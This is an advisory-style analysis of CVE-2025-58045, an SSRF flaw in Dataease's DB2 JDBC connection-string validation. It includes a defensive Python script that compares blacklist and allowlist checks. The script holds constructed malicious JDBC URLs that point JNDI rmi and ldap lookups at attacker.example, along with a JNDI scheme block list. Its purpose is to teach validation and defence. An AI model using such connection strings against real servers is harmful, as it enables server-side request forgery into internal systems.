CVE-2025-58045
Published: 15 September 2025
Summary
CVE-2025-58045 is a critical-severity server-side request forgery (SSRF, CWE-918) vulnerability in Dataease, an open source data analytics and visualization platform. Its CVSS v3.1 base score is 9.8 (Critical).
Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE ranks in the top 16.6% of CVEs by exploit likelihood, is not currently listed in the CISA KEV catalog, and has a referenced public proof of concept.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
SI-10 (Information Input Validation): mandates validating information inputs such as user-supplied DB2 JDBC connection strings, so that an unfiltered ldap parameter cannot be used to trigger SSRF.
SI-2 (Flaw Remediation): requires timely remediation of identified flaws, here the incomplete patch present in Dataease up to 2.10.12, by applying the fixed release 2.10.13 or later.
SC-7 (Boundary Protection): monitoring and controlling outbound communications from the Dataease host limits where an SSRF request triggered by a malicious JDBC connection string can reach.
MITRE ATT&CK Enterprise Techniques
Why these techniques?
T1190 (Exploit Public-Facing Application): direct remote exploitation of a public-facing Dataease instance through incomplete validation of DB2 JDBC connection strings, yielding SSRF.
NVD Description
Dataease is an open source data analytics and visualization platform. In Dataease versions up to 2.10.12, the patch introduced to mitigate DB2 JDBC deserialization remote code execution attacks only blacklisted the rmi parameter. The ldap parameter in the DB2 JDBC connection string was not filtered, allowing attackers to exploit the DB2 JDBC connection string to trigger server-side request forgery (SSRF). In higher versions of Java, ldap deserialization (autoDeserialize) is disabled by default, preventing remote code execution, but SSRF remains exploitable. Versions up to 2.10.12 are affected. The issue is fixed in version 2.10.13. Updating to 2.10.13 or later is recommended. No known workarounds are documented aside from upgrading.
Deeper analysis
CVE-2025-58045 affects Dataease, an open source data analytics and visualization platform, in versions up to 2.10.12. The vulnerability stems from an incomplete patch for prior DB2 JDBC deserialization remote code execution issues, which only blacklisted the "rmi" parameter in connection strings. The "ldap" parameter remained unfiltered, enabling attackers to manipulate DB2 JDBC connection strings and trigger server-side request forgery (SSRF), classified under CWE-918. In higher Java versions, LDAP deserialization (autoDeserialize) is disabled by default, blocking potential remote code execution but leaving SSRF viable.
An unauthenticated remote attacker (AV:N/AC:L/PR:N/UI:N/S:U) can exploit this over the network with low complexity. By crafting a malicious DB2 JDBC connection string carrying an ldap parameter, the attacker can force the Dataease server to issue unintended requests to internal or external systems; the assigned score treats the outcome as high confidentiality, integrity, and availability impact, at CVSS 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
The GitHub security advisory (GHSA-fmq3-6xhc-r845) and commit 77078658715bd85af5867afbfd5f1fcc37cf03c8 confirm the fix in Dataease version 2.10.13, recommending immediate upgrades to 2.10.13 or later. No workarounds are documented beyond updating.
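The advisory's core lesson is the shape of the check, not the missing word: a scheme blacklist on a connection string is always one scheme short. As an added example that is not Dataease's code (nor the fix in the cited commit), the Python script below contrasts three checks on a DB2 JDBC URL: a stand-in for the incomplete rmi-only blacklist, the same blacklist extended with ldap and the other JNDI schemes, and an allowlist of connection properties, which is the form of input validation SI-10 asks for. The URL grammar is the IBM JCC form jdbc:db2://host[:port]/database[:key=value;...]; the property used in the attacker strings is a DB2 JCC client-reroute property that takes a JNDI name, named here as an assumption about the vector, since the advisory only speaks of rmi and ldap "parameters". All sample URLs are constructed.

```python
"""Added example, not Dataease code: three checks on a DB2 JDBC connection string.

URL grammar assumed (IBM JCC driver):
    jdbc:db2://host[:port]/database[:key=value;key=value;...]
Sample URLs and the reroute property name are constructed for illustration.
"""
import re
from typing import Dict, Tuple

# JNDI URL schemes that turn a property value into an outbound lookup.
# rmi and ldap are the two the advisory discusses; the others are the remaining
# providers a JNDI lookup can reach, included so the blacklist is at least complete.
JNDI_SCHEMES = ("rmi", "ldap", "ldaps", "iiop", "iiopname", "corbaname", "dns")

# Constructed samples. The property name is an assumption about the vector.
BENIGN = "jdbc:db2://db.internal:50000/sales:user=report;password=s3cret;"
RMI_ATTACK = ("jdbc:db2://127.0.0.1:50000/x:"
              "clientRerouteServerListJNDIName=rmi://attacker.example:1099/obj;")
LDAP_ATTACK = ("jdbc:db2://127.0.0.1:50000/x:"
               "clientRerouteServerListJNDIName=ldap://attacker.example:1389/obj;")


def rmi_only_blacklist(url: str) -> bool:
    """Stand-in for the incomplete patch: reject the one scheme it knows about.
    Returns True when the URL is accepted."""
    return "rmi://" not in url.lower()


# Same idea with the list extended; still a blacklist, still only as good as the list.
SCHEME_RE = re.compile(r"(?:%s)://" % "|".join(JNDI_SCHEMES), re.IGNORECASE)


def scheme_blacklist(url: str) -> bool:
    """Accept unless any JNDI scheme appears anywhere in the string."""
    return SCHEME_RE.search(url) is None


def parse_db2_url(url: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a JCC URL into (host[:port], database, {property: value}).
    Property names are lower-cased so the allowlist is case-insensitive."""
    m = re.fullmatch(r"jdbc:db2://([^/]+)/([^:;]+)(?::(.*))?", url,
                     re.IGNORECASE | re.DOTALL)
    if not m:
        raise ValueError("not a jdbc:db2:// URL")
    host, db, raw = m.group(1), m.group(2), m.group(3) or ""
    props: Dict[str, str] = {}
    for item in raw.split(";"):
        if not item.strip():
            continue
        if "=" not in item:
            raise ValueError(f"malformed property {item!r}")
        key, value = item.split("=", 1)
        props[key.strip().lower()] = value.strip()
    return host, db, props


# Properties a data-source form legitimately needs. Anything else, including the
# JNDI client-reroute properties, is rejected by name, so no scheme list is needed.
ALLOWED_PROPS = frozenset({"user", "password", "currentschema", "sslconnection"})


def allowlist_check(url: str) -> Tuple[bool, str]:
    """Parse first, then accept only known properties. Returns (accepted, reason)."""
    try:
        _host, _db, props = parse_db2_url(url)
    except ValueError as exc:
        return False, str(exc)
    unknown = sorted(set(props) - ALLOWED_PROPS)
    if unknown:
        return False, "property not allowed: " + ", ".join(unknown)
    return True, "ok"


def triage(url: str) -> Dict[str, bool]:
    """Run all three checks; True means the check would let the URL through."""
    return {
        "rmi_only": rmi_only_blacklist(url),
        "scheme_blacklist": scheme_blacklist(url),
        "allowlist": allowlist_check(url)[0],
    }


if __name__ == "__main__":
    for name, url in (("benign", BENIGN), ("rmi", RMI_ATTACK), ("ldap", LDAP_ATTACK)):
        print(f"{name:7} {triage(url)}")
```

Run as-is, the ldap sample is the row to look at: the rmi-only check accepts it, exactly the gap the advisory describes, while both the extended blacklist and the allowlist reject it. The allowlist rejects it for a reason that does not depend on the scheme at all, which is why it is the check to keep; the extended blacklist is only worth carrying as defence in depth behind it.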
Details
- CWE(s)